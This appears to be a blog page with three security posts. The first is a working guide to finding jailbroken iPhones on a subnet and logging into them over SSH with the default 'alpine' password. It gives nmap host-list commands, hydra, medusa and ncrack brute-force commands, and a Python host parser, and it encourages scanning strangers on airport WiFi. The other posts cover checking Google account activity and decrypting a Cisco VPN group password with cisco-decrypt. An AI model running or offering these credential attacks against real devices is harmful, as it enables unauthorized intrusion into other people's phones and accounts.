Friday, November 4, 2016

Scan a subnet to find out jailbreak iPhone with default password

After jailbreaking, most users install OpenSSH on their iOS device. However, some of them do not know about, or simply forget to change, the default password. Below is the user list of an iPhone:



The default password for both the root and mobile accounts is "alpine".

So our goal is to scan a whole subnet and find out whether any jailbroken iOS devices accept an SSH login with the default username and password.

Tools: nmap (v7.01), plus hydra (v8.1), medusa (v2.2) or ncrack (v0.4ALPHA).

1. Connect your computer to the wireless network and find out the IP range: 192.168.1.9/24.

2. Use nmap to generate a hosts list: nmap -sL 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3. Or, if you only want to scan the live hosts, use: nmap -sP -n 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > liveHosts.lst

4. Create two text files: username.txt and password.txt

5. Run: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6. It took 12 minutes to get the password:

7. Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh

8. Ncrack can also do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9 (--exclude leaves that address out of the scan). You can press 'p' during the scan to list the credentials discovered so far.
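One caveat with steps 2 and 3 above: when nmap runs without -n and reverse DNS resolves a name, the report line reads "Nmap scan report for name (ip)" and awk's last field becomes "(ip)", which hydra, medusa and ncrack will not accept as a host. The following is an added example, not code from the original post, that builds the host list from nmap output while handling both line forms; the nmap output it parses is a constructed sample, and the exclude list is a hypothetical way of leaving out the scanning machine.

```python
import re
import ipaddress

# Constructed sample of `nmap -sL` / `nmap -sP` output. The second report line
# shows the "hostname (ip)" form that appears when reverse DNS is enabled.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-04 10:00 CST
Nmap scan report for 192.168.1.1
Host is up (0.0020s latency).
Nmap scan report for iphone.lan (192.168.1.12)
Host is up (0.015s latency).
Nmap scan report for 192.168.1.9
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""

# Either "Nmap scan report for <ip>" or "Nmap scan report for <name> (<ip>)".
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip_paren>[^)]+)\)|(?P<ip>\S+))$"
)


def parse_hosts(nmap_output, exclude=()):
    """Return the IP addresses named in nmap 'scan report' lines, in order.

    Addresses listed in `exclude` (e.g. the scanning machine, hypothetical
    here) are dropped, as are duplicates and anything that is not a literal IP.
    """
    excluded = {ipaddress.ip_address(x) for x in exclude}
    hosts = []
    for line in nmap_output.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("ip_paren") or m.group("ip")
        try:
            addr = ipaddress.ip_address(raw)
        except ValueError:
            continue  # not a literal address; skip rather than feed it to a tool
        if addr in excluded or addr in hosts:
            continue
        hosts.append(addr)
    return [str(a) for a in hosts]


def write_host_list(path, nmap_output, exclude=()):
    """Write one address per line (the format hosts.lst / liveHosts.lst use)."""
    hosts = parse_hosts(nmap_output, exclude)
    with open(path, "w") as fh:
        fh.write("\n".join(hosts) + "\n")
    return len(hosts)


if __name__ == "__main__":
    print("\n".join(parse_hosts(SAMPLE_NMAP_OUTPUT, exclude=["192.168.1.9"])))
```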

Following the steps above, you can easily modify the username and password files to perform a dictionary or brute-force attack.

Ok, that's it. Next time you go to an airport, connect your Kali Linux to the free WiFi, have a cup of coffee and scan the whole subnet. You might be surprised.

BTW, to change the passwords, just SSH to the iPhone as root and run "passwd" and "passwd mobile".


Friday, July 15, 2016

Check Your Google account activity

It is a good security practice to check your Google Account activity history regularly.

1. Check Gmail login history
  1) Log in to your Gmail mailbox and scroll to the bottom of the page; on the right-hand side there is a "Details" link.

  2) Click "Details" to bring up the Gmail login history:

  3) If someone has logged in to your account from elsewhere, click "Sign out all other web sessions" to sign them out.
  4) It is recommended to select the "Show an alert for unusual activity" option.

2. Check recently used devices
  1) Log in to your Google account.
  2) Open (copy & paste) this link: https://security.google.com/settings/security/activity
  3) The page lists the devices that have been active on your account in the last 28 days.


3. Check all activity history, including web browsing:
  1) Log in to your Google account.
  2) Open (copy & paste) this link: https://myactivity.google.com/myactivity

Wednesday, June 29, 2016

Extract Cisco VPN group Password from .pcf file

So you have a .pcf file. On Windows it is easy: just copy it into the Cisco VPN folder. On a MacBook, however, you still need the group password to set up the connection.

In the .pcf file the group password is stored encrypted, so you need to decrypt the string to get the clear-text password. Some websites offer to do this online, but you normally don't want to submit this kind of information to a public service.

Kali has a tool to decrypt it locally. Simply enter:

#cisco-decrypt [Encrypted Group Password String]